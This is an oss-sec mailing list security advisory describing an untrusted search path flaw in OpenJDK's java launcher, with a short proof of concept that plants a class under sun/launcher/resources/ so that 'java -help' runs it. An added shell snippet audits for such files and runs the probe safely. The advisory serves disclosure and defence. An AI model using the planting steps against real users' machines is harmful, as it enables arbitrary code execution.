oss-sec mailing list archives

OpenJDK: java(1): untrusted search path


From: Jakub Wilk <jwilk () jwilk net>
Date: Tue, 13 Jun 2017 17:23:13 +0200

Running "java -help" can load code from a subdirectory of cwd:

   $ javac launcher_en.java
   $ mkdir -p sun/launcher/resources/
   $ mv launcher_en.class sun/launcher/resources/
   $ java -help
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

This happens because:

* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar was specified), java sets "." as the user class path:
https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass

* The help message is apparently supposed to be internationalized.

* Java's localization machinery loads classes:
https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html


On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar files) is affected. It contains the following code:

   if java -d32 2>&1 | grep "does not support" > /dev/null; then
   ...

On 32-bit systems, this causes java to print the help message.

--
Jakub Wilk

Attachment: launcher_en.java
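
Added example (not part of the original message, and not jarwrapper's code): a check for files at the class path location used above, and a way to run the "java -d32" probe from a fresh empty directory so that the default "." user class path has nothing to load. The function names and the JAVA_BIN variable are assumptions made for this example.

```shell
#!/bin/sh
# Added example. Function names and JAVA_BIN are assumptions for illustration.

# List files under DIR that occupy the location the launcher's help bundle
# was loaded from in the post (sun/launcher/resources/ relative to the cwd).
# ResourceBundle resolves both .class and .properties bundles.
launcher_shadow_files() {
    dir=${1:-.}
    [ -d "$dir/sun/launcher/resources" ] || return 0
    find "$dir/sun/launcher/resources" -type f \
        \( -name 'launcher*.class' -o -name 'launcher*.properties' \) -print
}

# The jarwrapper-style probe, run from a fresh empty directory with CLASSPATH
# unset, so the default user class path "." points at a directory we created.
# JAVA_BIN must be an absolute path or a name found via PATH.
# Returns 0 if java reports that 32-bit mode is unsupported.
java_lacks_32bit() {
    java_bin=${JAVA_BIN:-java}
    probe_dir=$(mktemp -d) || return 2
    out=$(cd "$probe_dir" && unset CLASSPATH && "$java_bin" -d32 2>&1) || true
    rm -rf -- "$probe_dir"
    printf '%s\n' "$out" | grep -q "does not support"
}
```

Source the file, then call launcher_shadow_files on a directory to audit it, or use java_lacks_32bit in place of the bare "java -d32" pipeline.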